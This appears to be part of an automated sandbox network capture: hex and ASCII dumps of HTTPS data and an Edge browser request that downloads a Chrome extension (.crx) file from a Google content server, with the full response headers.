                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC770INData Raw: 70 dc f4 43 13 52 5d cd f6 d3 9f 16 94 91 b4 59 49 95 56 08 c4 da 92 9a 4a 76 2c 78 96 f0 e2 37 76 fb 66 b8 0e 9b 92 88 23 7e 7d e3 e0 64 56 b8 0e 8b 92 78 a8 14 ca 0d 3e 88 9c 82 f4 e9 5b ff f3 b4 2e 98 14 c1 44 ab af 8d 37 25 ac 5e e6 83 5a e7 e9 d1 29 61 d4 b0 b5 77 a3 15 67 9e 88 91 bd b2 7b dc 7e 1c 52 3f e1 4e 06 9b 38 9d 13 3e f3 ce e3 ea 5d 53 7a 1a 2f 49 49 51 23 52 2f f2 46 12 41 c5 3c 8c 47 04 fe a2 fa fa 29 a8 40 cf 88 4b 46 42 de f5 8e 62 da 57 df 75 4d 29 78 fa 74 7f 0d 8b 97 35 bc 59 e9 e4 6c 66 c0 38 94 1a 83 4d f5 e7 e5 23 0e e5 7d 61 d2 3c 7a 69 11 43 4f 4f da d9 21 67 13 6d 4b 11 2d cd 30 a5 25 25 b9 84 cd 50 e3 23 ce 9d db f7 b5 b1 89 6a 3e 15 cc 05 bd 07 84 c6 3f 04 06 7f 0e 58 34 32 cc c8 40 91 2f 65 4a ce 0d f8 89 1a 91 e7 17 76 fa
                                                                                                                                                                                                                                                                  Data Ascii: pCR]YIVJv,x7vf#~}dVx>[.D7%^Z)awg{~R?N8>]Sz/IIQ#R/FA<G)@KFBbWuM)xt5Ylf8M#}a<ziCOO!gmK-0%%P#j>?X42@/eJv
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC16384INData Raw: fb 01 50 e9 9a 72 e3 97 0c 93 97 19 6e 70 d1 4d 63 57 77 39 c7 56 f3 86 4c f8 1b dd 09 3f 90 a0 27 e7 af c6 07 7b 08 86 69 f2 4d 25 e9 3f b8 4b e1 bc 8d 36 c5 df 47 d4 7e b1 2e 21 66 d0 b1 85 5c e4 1f 3f ee d2 7c 71 9c d6 d8 f1 15 eb f9 e6 66 45 3d 92 ee 0e 17 ac bf 34 1f 71 a1 f5 ce cc 2c 2f c3 4b e5 ca f0 53 27 1f 06 aa 92 e6 f2 3a 6d 46 74 fd f6 0a 9a 21 83 48 f2 da 0e 52 7d 43 ce d7 02 c7 5d cd 65 ed df 58 21 24 77 67 4b 8e cd da 87 64 fa c4 5f 4e 56 38 cb 25 f0 29 be 89 f5 75 df f7 c9 55 f6 4b 8d 23 6f 24 b3 6a e5 7f ca e6 26 d6 f1 9e 1b 36 51 92 55 0b 37 94 5c 7a 40 f9 42 fe 95 7b 7a 10 bb df 9d be 27 ce 17 16 18 b5 50 cd 33 4c 11 b8 ac 5a ad 31 f7 f8 6c e5 55 bb 7e 0d ba aa f3 a6 1b ed ea 04 0b 12 cc 8f 5b 67 33 be 1d a3 8c 80 0c c1 76 f4 9f 92 eb
                                                                                                                                                                                                                                                                  Data Ascii: PrnpMcWw9VL?'{iM%?K6G~.!f\?|qfE=4q,/KS':mFt!HR}C]eX!$wgKd_NV8%)uUK#o$j&6QU7\z@B{z'P3LZ1lU~[g3v
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC16007INData Raw: 79 f7 75 5c 75 9b d4 5c 90 37 42 10 38 8a 5b 7e 8f 56 ee 54 47 fa f6 e4 e5 37 9d 8e bd b6 9b 77 26 28 26 e8 c3 6a 68 c6 d7 6e 53 e8 89 71 57 c6 39 35 fe cf b0 c8 50 4a e6 74 e9 2e 98 ee 35 ae 80 ef 37 4a 2c a2 05 79 8a fc 99 04 c6 23 c2 ef a6 3a 75 f0 3a c1 4c 05 29 e4 ed 5f af 8d 3d 3d 9f 7a bf 96 dd d4 47 87 a8 4e 30 49 75 d0 20 1c b7 27 a2 37 ae cf f1 e0 24 aa 34 5f 47 8e 67 0d e8 de 0c 93 81 77 13 ee f5 52 51 08 22 b3 fe 65 6f b3 03 ce 85 a4 0f fe 83 79 9a 06 46 b8 2e 8a 84 f8 70 af e4 38 8d 64 19 60 c2 4c 38 d5 16 d8 20 ce 53 d1 45 2d a1 e0 1c af 9c 97 0b 2c 64 31 ce 82 da 5c de 1b 4d af e4 6f 25 e9 e6 52 96 15 da 49 51 68 41 36 3a c5 ac cf 33 0e 12 9d 6d 15 94 64 a6 d0 3f 11 15 88 9b 19 c4 20 98 92 d8 95 6f 04 d6 d2 cb f1 9a e8 5f 5f dc e7 dc ea cd
                                                                                                                                                                                                                                                                  Data Ascii: yu\u\7B8[~VTG7w&(&jhnSqW95PJt.57J,y#:u:L)_==zGN0Iu '7$4_GgwRQ"eoyF.p8d`L8 SE-,d1\Mo%RIQhA6:3md? o__
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC16384INData Raw: 25 d9 9d ec 21 f1 09 10 77 d2 01 f0 09 d1 1c 40 c1 91 a2 08 6d 81 c0 71 12 97 3d 4f 91 f4 14 e6 91 84 f2 a4 0f 1d c6 fc 0e 98 4b 11 d0 6c be 15 04 ad 1f 01 9b 01 eb 31 65 c7 d2 05 48 9b 15 41 30 97 ce 41 07 1b 6c 12 0a 72 5d ce 82 ab 0f a1 78 82 14 fe 55 a7 00 28 48 ad fa 6a 11 3e 6c 02 65 bc 80 56 47 b2 98 5b a6 de 16 e0 42 e4 0c 1a 42 d3 f1 fb 5b e3 10 1e fd f7 a0 b5 40 e1 c3 cc 3e d2 e3 10 2d 8d e1 c3 78 5e b2 26 8c 04 3d a1 96 4f 67 d3 b5 88 eb a0 65 35 82 b9 3f 8d a7 7f be 05 38 26 19 de 44 2b b2 e4 90 fa 2c 4f 98 67 24 42 63 22 50 da a3 3f 68 07 bb 76 05 a0 cc 75 cd d6 92 27 c6 fe 8b e0 96 f9 f4 4b 88 d6 44 72 97 37 34 86 00 d1 f0 5b b9 e3 0b 05 90 9d ba 15 69 cd 7d 81 3e f2 ff ae 18 57 98 1b f4 d1 8f 20 98 af 12 5e e4 dd 06 2d 3c fb cb d0 97 4b 02
                                                                                                                                                                                                                                                                  Data Ascii: %!w@mq=OKl1eHA0Alr]xU(Hj>leVG[BB[@>-x^&=Oge5?8&D+,Og$Bc"P?hvu'KDr74[i}>W ^-<K
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC16384INData Raw: fd 27 3d aa 86 2b b7 bc 70 91 7c aa 02 28 f3 33 6e 9a 19 ed 83 6e 88 67 45 b6 ef f1 8e ce c6 75 ff 47 48 cc 69 f5 f1 67 a1 f8 99 3f f5 1c 9e b5 2a 04 7f 88 09 ea 31 fd 95 46 7a 49 72 1a 05 69 6e a8 ae a1 cd 03 5c f5 98 81 a8 cd 2b f0 3f f9 ee cc 4b 2c 7b 78 52 3f aa 7e 32 9b 1f 3f 7e b9 b8 cc 71 d2 07 81 1a 79 9d 08 14 90 36 68 ce 8c 18 e0 f4 a0 4c 10 1c d0 e0 c0 b5 64 26 a0 1f b1 0f cf cb fc d6 73 e0 6a 4b b0 75 73 f2 53 da 2c 0b 59 8e d8 47 ac 1d d2 93 67 a2 77 59 cc 5a 4c 06 46 3f 27 af 84 56 ee 6c 86 2e 1f d7 2a f1 61 22 64 81 97 a3 a1 9a 40 c1 1b cc 1e f3 6b 3e 2a a5 6a 39 0b 39 cc 76 85 0d dd 90 b1 57 50 22 cf 1c 6f 22 9b 5d 84 35 b4 ce bf 2d 88 7d 23 6b fd 0d f8 51 44 88 17 eb 5d ed 3c fd 62 45 c9 f0 b0 d1 86 0f ec 68 c5 43 1a 7c bb 7b 83 b7 a8 41
                                                                                                                                                                                                                                                                  Data Ascii: '=+p|(3nngEuGHig?*1FzIrin\+?K,{xR?~2?~qy6hLd&sjKusS,YGgwYZLF?'Vl.*a"d@k>*j99vWP"o"]5-}#kQD]<bEhC|{A
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC377INData Raw: 61 35 2b 47 e9 38 38 f5 ac 72 9d 36 e1 82 73 76 bc 72 7b ad fe b4 b0 eb c4 71 fc ca 61 d6 4c a7 c3 f4 05 56 7e 36 49 85 98 0e 2f c9 be 0c b2 c6 58 9f 30 b1 46 43 7b f6 73 aa 82 7f 2f c9 8a 00 20 d0 4a f0 c5 13 68 9a 01 d8 56 73 90 b1 02 63 c9 12 c2 04 e3 c5 90 b3 06 51 cf d6 69 1d 61 aa 87 ca 72 d7 c1 5c 0c 1b f3 b9 49 f7 1e 3d 21 f1 ee 39 60 2b 6b da 4b 39 92 1d ee 51 d5 8c 7d 56 4c 20 c1 eb f5 d7 db 69 fe 5f ca c4 d3 59 4b 4d 4e 49 27 8b aa e9 0e b6 ed 01 f3 15 c3 cb e7 77 47 27 e6 14 57 97 67 0b db 8e ce f0 4d 59 e8 3d 07 e5 e8 1c 5a 2f 4e 52 99 2c d5 d2 9e bb f0 e5 6a f1 32 8b a3 64 08 94 ff 26 cf b0 68 2e 01 ac b1 64 55 51 0a 43 59 16 be 10 87 38 9a d9 b2 27 42 f9 ee bd 55 43 5f 6d 58 e7 6b 37 83 d7 1d 36 72 76 fd e4 c4 f9 36 66 e0 62 7e c1 b0 8d 52
                                                                                                                                                                                                                                                                  Data Ascii: a5+G88r6svr{qaLV~6I/X0FC{s/ JhVscQiar\I=!9`+kK9Q}VL i_YKMNI'wG'WgMY=Z/NR,j2d&h.dUQCY8'BUC_mXk76rv6fb~R
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC16384INData Raw: 8f d8 13 a1 12 95 e0 57 32 b8 17 bc 75 cf 82 5b 28 42 fa 52 c5 ac 5b 23 4d d8 cb 31 ce ca 49 a8 f1 ea b5 5b 9e c6 26 72 df 67 e7 5d d6 df 8e de d1 9f b0 a8 4f 2c 9b 1f a2 37 bf e2 64 a3 73 61 47 7d a2 1e 1a 48 dc 22 34 9b cf 45 5e 24 d9 84 e3 ef b5 eb c3 e6 02 af 9a 7b 07 cf 31 5d 6c 4d 20 dc fb c6 87 d6 6b 5a 68 f6 2f cf fb fa 2b fa be a4 23 6f b4 b6 cd a7 7d fb 15 58 bf cb f5 e5 dc 33 3d f1 e4 db 6f e8 d7 5f ee bb 2a 8a c1 ab d1 3a cf 59 ce ff ac 2e ae f7 b4 ce 73 5b f5 3a 30 f2 9c d3 cf 35 fe 1c 57 13 34 4c 15 c3 68 2b 6e e1 6f e1 56 17 0f 86 c4 68 c5 a1 51 9e fb 4d e5 35 ad f8 15 2f 0e 96 92 65 92 eb 8d b2 ec 47 9b 8e 35 84 25 4d 4c 53 52 99 2c 08 d8 e0 31 72 f6 6c a1 75 5e a1 ff ab 87 69 a1 ce 5f eb 35 f7 a4 fc 50 d7 0d fe 86 77 aa 7a 36 f5 51 77 79
                                                                                                                                                                                                                                                                  Data Ascii: W2u[(BR[#M1I[&rg]O,7dsaG}H"4E^${1]lM kZh/+#o}X3=o_*:Y.s[:05W4Lh+noVhQM5/eG5%MLSR,1rlu^i_5Pwz6Qwy
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC16384INData Raw: ea 78 00 e3 ab 11 42 b5 cc 67 c8 03 e0 d9 c1 8d 6e 9a c0 18 a7 1e 40 2c 98 58 94 15 21 98 5c 84 61 16 4c 5a 01 4e 60 7c db 38 27 09 a4 41 d4 97 07 40 c7 32 ec 30 80 87 93 31 c8 77 81 f5 ae b3 89 ac 46 52 1d 04 0f 50 86 1e 0c 4e ff b6 55 61 45 e4 ca c1 89 80 67 54 8d a0 6b 7b 81 21 6c cf c8 42 82 5e bd 53 93 85 dc 0b 62 da 91 1d 52 8c 7c 7c 40 1e c4 4d 51 8b bd 59 11 22 33 aa a4 15 32 19 f3 4a bd 70 76 23 f5 5a a7 84 74 69 aa 50 44 07 b4 76 e7 a6 09 aa 12 af 67 ed 9a b6 64 34 f9 9d 39 94 04 33 ea 4a 60 2e b1 91 e5 8c 8a fb 20 7e 78 51 8a 03 8a 29 18 8b 5a e1 24 95 7a e3 de 94 97 96 82 df ee 5a 37 3a 6e 8d ae 1b f5 5f 77 ee cd 66 dc e2 56 7a 5c 37 db 30 e0 56 b6 b9 56 80 36 b4 31 60 ea 86 a8 a0 50 af e2 85 19 41 ce 32 da a7 53 95 7c 52 c9 97 03 2a eb 68 a0
                                                                                                                                                                                                                                                                  Data Ascii: xBgn@,X!\aLZN`|8'A@201wFRPNUaEgTk{!lB^SbR||@MQY"32Jpv#ZtiPDvgd493J`. ~xQ)Z$zZ7:n_wfVz\70VV61`PA2S|R*h


                                                                                                                                                                                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                  7192.168.2.549742142.250.181.654437596C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                                                                                                                  TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                  2024-12-19 12:44:26 UTC594OUTGET /crx/blobs/AW50ZFvmkG4OHGgRTAu7ED1s4Osp5h4hBv39bA-6HcwOhSY7CGpTiD4wJ46Ud6Bo6P7yWyrRWCx-L37vtqrnUs3U44hGlerneoOywl1xhFHZUyPx_GIMNYxNDzQk9TJs4K4AxlKa5fjk7yW6cw-fwnpof9qnkobSLXrM/GHBMNNJOOEKPMOECNNNILNNBDLOLHKHI_1_85_1_0.crx HTTP/1.1
                                                                                                                                                                                                                                                                  Host: clients2.googleusercontent.com
                                                                                                                                                                                                                                                                  Connection: keep-alive
                                                                                                                                                                                                                                                                  Sec-Fetch-Site: none
                                                                                                                                                                                                                                                                  Sec-Fetch-Mode: no-cors
                                                                                                                                                                                                                                                                  Sec-Fetch-Dest: empty
                                                                                                                                                                                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36 Edg/117.0.2045.47
                                                                                                                                                                                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                                                                                                                                                                                  Accept-Language: en-GB,en;q=0.9,en-US;q=0.8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC563INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                  Accept-Ranges: bytes
                                                                                                                                                                                                                                                                  Content-Length: 154477
                                                                                                                                                                                                                                                                  X-GUploader-UploadID: AFiumC7CZ0UZ67drcZI4imfdyK3crLxFmtx6SBomJC1Qfn8mJZzHNJmIxyaV4JMGqJIHwbMn
                                                                                                                                                                                                                                                                  X-Goog-Hash: crc32c=F5qq4g==
                                                                                                                                                                                                                                                                  Server: UploadServer
                                                                                                                                                                                                                                                                  Date: Wed, 18 Dec 2024 15:58:14 GMT
                                                                                                                                                                                                                                                                  Expires: Thu, 18 Dec 2025 15:58:14 GMT
                                                                                                                                                                                                                                                                  Cache-Control: public, max-age=31536000
                                                                                                                                                                                                                                                                  Age: 74773
                                                                                                                                                                                                                                                                  Last-Modified: Thu, 12 Dec 2024 15:58:04 GMT
                                                                                                                                                                                                                                                                  ETag: a01bfa19_322860b8_b556d942_61bcf747_a602b083
                                                                                                                                                                                                                                                                  Content-Type: application/x-chrome-extension
                                                                                                                                                                                                                                                                  Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                                                                                                                  Connection: close
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC827INData Raw: 43 72 32 34 03 00 00 00 f3 15 00 00 12 ac 04 0a a6 02 30 82 01 22 30 0d 06 09 2a 86 48 86 f7 0d 01 01 01 05 00 03 82 01 0f 00 30 82 01 0a 02 82 01 01 00 9c 5e d1 18 b0 31 22 89 f4 fd 77 8d 67 83 0b 74 fd c3 32 4a 0e 47 31 00 29 58 34 b1 bf 3d 26 90 3f 5b 6a 2c 4c 7a fd d5 6a b0 75 cf 65 5b 49 85 71 2a 42 61 2f 58 dd ee dc 50 c1 68 fc cd 84 4c 04 88 b9 99 dc 32 25 33 5f 6f f4 ae b5 ad 19 0d d4 b8 48 f7 29 27 b9 3d d6 95 65 f8 ac c8 9c 3f 15 e6 ef 1f 08 ab 11 6a e1 a9 c8 33 55 48 fd 7c bf 58 8c 4d 06 e3 97 75 cc c2 9c 73 5b a6 2a f2 ea 3f 24 f3 9c db 8a 05 9f 46 25 11 1d 18 b4 49 08 19 94 80 29 08 f2 2c 2d c0 2f 90 65 35 29 a6 66 83 e7 4f e4 b2 71 14 5e ff 90 92 01 8d d3 bf ca a0 d0 39 a0 08 28 e3 d2 5f d5 70 68 32 fe 10 5e d5 59 42 50 58 66 5f 38 cc 0b 08
                                                                                                                                                                                                                                                                  Data Ascii: Cr240"0*H0^1"wgt2JG1)X4=&?[j,Lzjue[Iq*Ba/XPhL2%3_oH)'=e?j3UH|XMus[*?$F%I),-/e5)fOq^9(_ph2^YBPXf_8
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: d2 ff f8 fb 8f f1 b3 aa ea fc 5a ff 65 a8 3e ff f2 76 56 d5 8f bf fe b8 9e df fb 4a fe 2c 2f fd 58 f5 e3 8f bf ff eb c7 90 3f d4 25 97 fa fc ea 11 36 05 b0 0d c1 6d 23 05 75 5d 82 5a 95 8f c3 96 5b d7 73 d6 4d 5f 19 18 df 4a a0 b6 22 39 6c 91 fb 6c a3 f3 fd 2c 7c d5 8b 14 19 87 e6 72 d6 e7 d7 51 43 c1 e1 fb ef 9d ba 8a 34 3a 9f d4 f8 cb a1 77 6a e9 bf 9f 4f e7 c3 14 35 ef b7 d2 b7 fb ef 73 ca 6e f7 25 e1 ee 92 a5 e8 f2 fd 79 01 10 17 0f 63 e2 fc fd 91 b4 23 46 0c 8e b4 1b 1b e1 a3 2e ef a8 29 67 76 28 cd 10 21 53 ec 49 17 3e f2 20 dc 54 be b0 c5 23 dc 1d 83 eb b9 f4 a1 91 ef 0f db 83 da 5d 0b 80 ea c2 67 f3 11 c0 ee 08 4c 55 5a a8 16 40 1f 77 c3 5c 80 cd f9 b8 0f 1f 05 d8 fd 7b 9d df f7 16 4e b9 a7 7a 66 d5 6e 02 19 3a 72 f1 95 74 0c 72 0e cf 9c ab 3d a2
                                                                                                                                                                                                                                                                  Data Ascii: Ze>vVJ,/X?%6m#u]Z[sM_J"9ll,|rQC4:wjO5sn%yc#F.)gv(!SI> T#]gLUZ@w\{Nzfn:rtr=
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: fb 40 b0 b4 75 cd a2 45 ec b5 f7 5f 79 7d 9c cd 6c 12 a9 d6 7b 85 01 32 0c 8b 32 98 4b 0f f9 85 0b e3 3c 40 38 52 9e 25 bb 7a 8f 3d a8 39 20 c4 e5 c3 0c b0 21 bf 16 af df 1f d6 7a ee 0d 99 c3 31 ea 95 12 c6 e4 1c 29 ba 47 74 ec a8 92 fb c2 95 5e e2 ca b0 a4 22 c6 26 76 ca 5e 73 34 d5 7c c4 e8 14 05 cb 7b 5f fe 1f 38 b8 6c f0 90 19 b5 92 81 f8 cc 81 4a 13 2f 1a 49 e0 78 71 23 7a 01 c2 0c 77 ba 14 2c e7 2c 3c 91 d1 4e bc 96 0a 3a 18 c8 cd 72 ef c9 b5 f8 8f da e7 6e b0 2f 3c 34 d7 ad f4 42 40 4c d8 a1 40 88 dc 18 8e 64 d6 1c e0 63 1e 05 cf 20 06 f7 3b 0b 70 9c 51 ec 56 dd fb 7d 11 7f 6b 6d ef 0d 1e 52 b0 4d ad e1 45 2a 6f 3e c1 ba 25 26 a2 d8 aa 43 9d 31 12 d1 9a b3 ce 3a 54 eb 81 1f 1b e6 0b 22 ca 2f 2d 08 8a 65 ef 77 c9 57 62 8f 5b 75 cd 1a e5 55 bd 63 44
                                                                                                                                                                                                                                                                  Data Ascii: @uE_y}l{22K<@8R%z=9 !z1)Gt^"&v^s4|{_8lJ/Ixq#zw,,<N:rn/<4B@L@dc ;pQV}kmRME*o>%&C1:T"/-ewWb[uUcD
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: ae 14 17 a9 0a ca 56 6b be f7 64 1f 49 78 97 5a b7 31 fc 9e 6d a1 03 6f d9 e7 f7 53 08 01 c3 c5 b9 7a b9 76 b6 db 53 9b 34 0a 6b 4e 57 59 c3 5e 19 bf 00 5d 8b aa e8 60 1e 51 13 25 a6 e3 15 9d 7d ca 7d 96 c5 a9 08 a9 a5 b6 19 1f 60 d5 2f 62 7f 2f 56 f2 3d 57 f8 23 62 ea 11 f9 e1 a4 f7 19 e1 40 b8 32 a8 3b d1 0e 75 e4 ef 5e a5 8b 7d 02 3c b3 b0 c2 54 f7 e1 89 cc ec 28 67 76 59 d4 5a cb 31 52 23 4c d6 ce d6 b5 6f 6c b9 2b 3b 9d 71 b7 59 27 29 f2 cd 97 cc b0 23 c2 6d 96 10 c7 cf 94 88 f2 6e 6a 64 2b 51 dc e1 73 d9 1f ee 59 f3 bf e0 1f e0 37 0a e3 95 33 5e 91 a6 46 6d ea cf 64 89 31 b8 c4 90 37 6a 0a ad fa f8 c0 5c 14 73 a2 84 ce 1a f7 08 d6 da 7b b1 29 06 b5 cf 3b d4 47 7c d1 e7 3f 8a b5 cf 36 82 c8 ca 3a 7b 7f 72 db 3b 69 f1 47 d9 87 17 cd 7f 57 ce c3 98 bb
                                                                                                                                                                                                                                                                  Data Ascii: VkdIxZ1moSzvS4kNWY^]`Q%}}`/b/V=W#b@2;u^}<T(gvYZ1R#Lol+;qY')#mnjd+QsY73^Fmd17j\s{);G|?6:{r;iGW
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: fd bb 9e 52 c0 c6 ac 63 6d 6a 7d 63 a0 ee bf 61 fe 67 d7 ed a2 91 18 ea 83 e8 bc 84 3c f6 92 99 0e 39 52 fb 50 a4 8e 8d b9 50 b4 45 0e 0e e8 5c f4 48 13 5f 36 61 f7 d9 4a 58 d8 a4 e0 0f 1c 33 8b 34 04 b9 4e a3 a9 25 bf ca 6e d4 75 b6 3b e7 dc 7e 2b 83 f0 4b fc 4f d7 6f 8d 99 43 f4 2a 3b 16 67 fd f0 c0 81 0c 22 df 3e 68 cf fc 25 d5 a0 cd 23 dc 62 3a 6c 78 5f c7 cc 17 bd ce 53 9b 88 64 9b f2 5b 5f 98 71 3d 74 42 5f cb ac e5 6f 5a 85 bf 31 ff bd 96 74 6d fd 76 0d b8 3b 7f f7 5c 6e 6a 9f 9b 0e 4a ef 8f 11 b9 2d f8 fd b3 ca 10 dc fc ce f2 bf cd d3 72 cd a9 3a 3f 7e e8 ba 50 b9 e5 8c 85 66 3c 7d 7c cb b9 ae b1 2e d4 de 6e 77 cd fd f1 92 27 87 ff fc ac be ef 47 09 d4 77 ef e8 3d f4 6e 27 97 de a2 ef ff f7 ce 43 af 53 f3 cd ee 9a 5a 42 95 3d 1a be f9 ed d4 c0 dd
                                                                                                                                                                                                                                                                  Data Ascii: Rcmj}cag<9RPPE\H_6aJX34N%nu;~+KOoC*;g">h%#b:lx_Sd[_q=tB_oZ1tmv;\njJ-r:?~Pf<}|.nw'Gw=n'CSZB=
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: 73 3d 2b b0 5b de b2 1b ac ac c0 bf bd 49 06 60 0a 98 e5 c3 12 dc fa fd 5e 94 c6 93 21 f3 32 c4 3a e7 6a 98 8e e5 33 47 4c 6f 66 cf 66 8f 00 02 a7 37 5d af 9f 55 1c 7d 2f aa 0d 63 45 34 4d 9c 3f 0c 6f 34 66 3d 1f 97 c5 b3 39 14 7b e1 d5 d2 27 58 29 01 4d de d6 12 94 45 a0 b2 25 18 06 ec ff 89 3f ee 0f 01 1c 62 05 b0 8e 6f 05 55 2b 9a 4e 2b 15 bb 5a f9 59 a9 86 d5 aa 13 d9 6a a3 fa 56 e4 c4 f6 2d 76 5b 8b dd a8 15 f0 25 70 2a 41 38 f2 87 e9 80 f6 c5 43 a6 19 c3 34 71 63 28 94 f7 d5 3e a8 8d fb a7 40 9e 7a b1 db b3 2a 31 8c 90 2f 56 e5 7c e4 f7 bb 83 9f 23 9a 0d 8c ce 42 04 aa 0d 19 a0 6f d7 b2 9f 34 76 5f 6d 6e 6e d6 69 e4 4e a8 e8 02 80 b4 a5 20 5a 4b c7 e1 90 e1 cc 0d d0 9a 83 61 2e 2f 3c 5f c9 d6 50 bd 42 9b 7a 69 bf 37 7e c9 9f 3e a7 e6 e3 76 c6 ba 83
                                                                                                                                                                                                                                                                  Data Ascii: s=+[I`^!2:j3GLoff7]U}/cE4M?o4f=9{'X)ME%?boU+N+ZYjV-v[%p*A8C4qc(>@z*1/V|#Bo4v_mnniN ZKa./<_PBzi7~>v
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: 3d 19 8d fb dd dd 4b 60 21 0e f5 cc 1f 33 7c 0c d2 d1 00 b1 81 5e 69 42 40 e6 1a a3 91 ad d6 e5 68 63 43 03 68 03 51 81 cd 15 5b 50 25 01 0d 0a a0 cc 37 ab d0 e0 70 db 64 42 b6 9f 01 12 e5 58 36 df 46 f2 c0 36 2c 9a 5a d0 f7 89 35 0a f9 9b 66 01 58 a1 26 0c 6a 4d 5c 4b 7b e9 58 7b 57 de c3 72 c3 01 d2 14 c3 96 8f 11 ca 88 39 7c 1d 63 60 72 6c d4 ef 71 f2 9c 49 0e 9c cd 6d 82 37 6e c9 82 9c 2f 0b 6e 24 69 39 f2 e2 78 83 7f 53 04 3d b6 a3 da b9 a8 71 16 77 6c c9 a0 89 56 73 5e 14 11 7c 7c 73 cb 7f 2a d9 f2 39 07 8f 6b 7d 56 ca c0 8d 61 7f 28 ec 36 ce 58 4c 31 40 12 ec 2c 6f 2c 2b 48 03 40 f2 e5 2b 62 36 46 17 48 75 0a bd e4 dc 22 b3 6e 9c 63 a5 86 71 d4 b8 31 30 23 af 19 81 78 83 e3 e9 5a 37 f8 9c 4b 22 f0 7a 80 ff ce 66 cd 63 e2 27 5d 67 e0 5c b9 05 91 82
                                                                                                                                                                                                                                                                  Data Ascii: =K`!3|^iB@hcChQ[P%7pdBX6F6,Z5fX&jM\K{X{Wr9|c`rlqIm7n/n$i9xS=qwlVs^||s*9k}Va(6XL1@,o,+H@+b6FHu"ncq10#xZ7K"zfc']g\
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: fc c2 eb d3 07 f9 cb a9 80 c2 b8 ec 66 aa f4 9a a9 4f 23 9b 16 c3 b7 0c e9 94 d8 01 42 0d 39 01 c1 0c 00 05 bb 46 fd 6c 74 68 20 1a 73 50 b5 25 bf 9b 6b a1 76 bd ec 3e 5a 2f 34 82 c8 be 2c eb 72 e9 75 b9 81 5a f1 03 58 07 57 22 05 05 6e 85 8b 28 3e ed b7 c4 45 0d bd de ae 37 13 31 f9 80 3b 68 01 71 40 1d 01 b4 9c 4e 2d fe e0 0a c4 3b eb d6 d2 a0 03 02 2f 96 20 44 6d 8b bf 7c 02 6e 06 9b 90 bf 10 fe 39 81 a6 8e a4 2a f2 45 4e 66 1c a4 2b 79 31 d8 41 b0 51 04 2d 99 39 bc 77 2e 54 8b 76 6d a7 d8 02 27 86 e2 f3 dc 57 e3 03 ad 3a ec 69 93 fb 84 77 d0 7c da 4b 0a 2e 39 2d a6 36 d1 88 83 03 6c 5b fc 2f 79 5b 7d d8 a9 35 da cd 0e 88 f8 e2 03 a7 27 d3 a9 e0 0c 12 9c 09 82 d3 79 24 9a 2b cc 48 be 25 3a ab ff d0 19 81 59 31 2f 46 8c 01 89 b0 9a f6 ea aa b3 5c b7 89
                                                                                                                                                                                                                                                                  Data Ascii: fO#B9Flth sP%kv>Z/4,ruZXW"n(>E71;hq@N-;/ Dm|n9*ENf+y1AQ-9w.Tvm'W:iw|K.9-6l[/y[}5'y$+H%:Y1/F\
                                                                                                                                                                                                                                                                  2024-12-19 12:44:27 UTC1390INData Raw: 41 d0 ce 03 89 61 57 3a e2 0c 48 31 96 53 3b 09 22 96 46 85 74 06 dc 97 14 6e 80 5c 17 6e 36 1a 8d 75 f8 7f 78 5c 36 a8 54 68 6b 72 c2 09 eb c5 52 50 48 b9 ff e5 a7 0f 83 fe 39 c0 51 2f 55 aa a1 dd 0a 37 5c c2 bc b6 5f 75 f5 b9 25 6c 88 f3 83 06 9b 56 b8 4a 65 5e 38 8b ca 20 06 d7 57 1a f5 b5 67 d3 e7 cf d7 5e bd b0 17 96 14 85 5e 3c 5b 03 09 6f 56 e4 52 22 10 cb 74 09 03 2f bd f9 23 7e 95 07 5a 94 28 41 b2 07 11 ae 60 79 c8 fb cd c2 c6 aa 3b ff 69 1b 7c 15 7c 8c 84 24 dc 79 fa e4 d1 a3 a5 ed fe e0 66 98 c6 c9 78 09 45 c6 ed ac 3f 9a 0c c3 a5 83 d4 1b b2 e1 cd d2 d6 64 9c f4 87 a3 da a3 a5 d3 0f 3b df 56 0f 52 3f ec 8d c2 d5 fd 00 d6 3f 8d d2 70 d8 5c da 1a 80 ee 12 ae ae d5 ea 8f 9e 3c a5 a3 07 57 cc bd 02 12 70 3b 73 2e 49 16 9f 4e 31 20 51 39 f9 af 05
                                                                                                                                                                                                                                                                  Data Ascii: AaW:H1S;"Ftn\n6ux\6ThkrRPH9Q/U7\_u%lVJe^8 Wg^^<[oVR"t/#~Z(A`y;i||$yfxE?d;VR??p\<Wp;s.IN1 Q9
